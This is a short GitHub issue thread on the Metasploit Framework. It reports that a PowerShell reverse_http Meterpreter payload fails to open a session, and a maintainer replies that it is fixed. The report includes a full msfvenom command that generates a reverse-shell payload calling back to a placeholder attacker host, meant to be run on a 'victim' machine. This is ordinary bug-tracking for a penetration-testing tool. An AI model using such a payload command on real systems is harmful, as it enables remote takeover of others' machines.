### ISSUE TITLE
MSFVenom and Reverse_HTTP Payload Issues

### ISSUE THREAD

**Issue by ChrisTruncer** [rapid7/metasploit-framework#12038]
Steps to reproduce
1. Build PowerShell payload (msfvenom -p windows/meterpreter/reverse_http LHOST=X.X.X.X LPORT=YYYY -f psh > output.ps1
2. Stand up metasploit reverse_http listener on the corresponding IP and Port
3. Run output.ps1 on windows victim VM

PowerShell script shows output from the CreateThread function, but no session is established. WerFault.exe is spawned upon thread execution.

## Expected behavior

Session should be established

## Current behavior

werfault.exe is spawned and no session is established.

### Metasploit version

Metasploit v.5.0.35-dev

### I installed Metasploit with:

Nightly installer

### OS

Debain

**Comment by busterb** [comment]
I see the issue, should have a quick fix for it.

**Comment by busterb** [comment]
Resolved as well, thanks.
